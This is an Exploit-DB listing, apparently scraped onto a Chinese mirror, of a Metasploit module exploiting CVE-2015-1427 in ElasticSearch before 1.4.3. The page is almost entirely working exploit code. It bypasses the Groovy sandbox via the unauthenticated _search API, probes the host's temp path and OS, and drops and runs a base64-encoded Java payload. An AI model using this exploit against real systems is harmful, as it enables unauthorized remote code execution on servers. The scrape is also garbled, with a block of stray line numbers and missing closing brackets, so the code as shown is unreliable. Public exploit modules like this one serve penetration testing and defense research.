ElasticSearch – Search Groovy Sandbox Bypass (Metasploit)

Exploit Database
114 阅读

作者： Metasploit

日期： 2015-03-16
类别：
- remote
平台：
- java
来源：https://www.exploit-db.com/exploits/36415/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::FileDropper

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'ElasticSearch Search Groovy Sandbox Bypass',

'Description'=> %q{

This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,

exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the

REST API, which does not require authentication, where the search function allows

groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName

to reference arbitrary classes. It can be used to execute arbitrary Java code. This

module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.

'Author' =>

[

'Cameron Morris', # Vulnerability discovery

'Darren Martyn', # Public Exploit

'juan vazquez' # Metasploit module

'License'=> MSF_LICENSE,

'References' =>

[

['CVE', '2015-1427'],

['URL', 'https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/'],

['URL', 'https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch'],

['URL', 'http://drops.wooyun.org/papers/5107']

'Platform' => 'java',

'Arch' => ARCH_JAVA,

'Targets'=>

[

['ElasticSearch 1.4.2', {}]

'DisclosureDate' => 'Feb 11 2015',

'DefaultTarget' => 0))

register_options(

[

Opt::RPORT(9200),

OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"])

], self.class)

end

def check

result = Exploit::CheckCode::Safe

if vulnerable?

result = Exploit::CheckCode::Vulnerable

end

result

end

def exploit

print_status("#{peer} - Checking vulnerability...")

unless vulnerable?

fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")

end

print_status("#{peer} - Discovering TEMP path...")

res = execute(java_tmp_dir)

tmp_dir = parse_result(res)

if tmp_dir.nil?

fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")

else

print_good("#{peer} - TEMP path on '#{tmp_dir}'")

end

print_status("#{peer} - Discovering remote OS...")

res = execute(java_os)

os = parse_result(res)

if os.nil?

fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")

else

print_good("#{peer} - Remote OS is '#{os}'")

end

if os =~ /win/i

tmp_file = "#{tmp_dir}#{rand_text_alpha(4 + rand(4))}.jar"

else

tmp_file = File.join(tmp_dir, "#{rand_text_alpha(4 + rand(4))}.jar")

end

register_files_for_cleanup(tmp_file)

print_status("#{peer} - Trying to load metasploit payload...")

java = java_load_class(os, tmp_file)

execute(java)

end

def vulnerable?

java = 'java.lang.Math.class.forName("java.lang.Runtime")'

vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...")

res = execute(java)

result = parse_result(res)

if result.nil?

vprint_status("#{peer} - no response to test")

return false

elsif result == 'class java.lang.Runtime'

return true

end

false

end

def parse_result(res)

unless res

vprint_error("#{peer} - No response")

return nil

end

unless res.code == 200 && res.body

vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")

return nil

end

begin

json = JSON.parse(res.body.to_s)

rescue JSON::ParserError

return nil

end

begin

result = json['hits']['hits'][0]['fields']['msf_result']

rescue

return nil

end

result.is_a?(::Array) ? result.first : result

end

def java_tmp_dir

'java.lang.Math.class.forName("java.lang.System").getProperty("java.io.tmpdir")'

end

def java_os

'java.lang.Math.class.forName("java.lang.System").getProperty("os.name")'

end

def java_load_class(os, tmp_file)

if os =~ /win/i

tmp_file.gsub!(/\\/, '\\\\\\\\')

end

java = [

'c=java.lang.Math.class.forName("java.io.FileOutputStream");',

'b64=java.lang.Math.class.forName("sun.misc.BASE64Decoder");',

"i=c.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\");",

'b64_i=b64.newInstance();',

"i.write(b64_i.decodeBuffer(\"#{Rex::Text.encode_base64(payload.encoded)}\"));",

'loader_class=java.lang.Math.class.forName("java.net.URLClassLoader");',

'file_class=java.lang.Math.class.forName("java.io.File");',

"file_url=file_class.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\").toURI().toURL();",

'loader=loader_class.newInstance();',

'loader.addURL(file_url);',

'm=loader.loadClass(\'metasploit.Payload\');',

'm.main(null);'

]

java.join

end

def execute(java, timeout = 20)

payload = {

"size" => 1,

"query" => {

"filtered" => {

"query" => {

"match_all" => {}

}

"script_fields" => {

"msf_result" => {

"script" => java

}

res = send_request_cgi({

'uri'=> normalize_uri(target_uri.path.to_s, "_search"),

'method' => 'POST',

'data' => JSON.generate(payload)

}, timeout)

res

end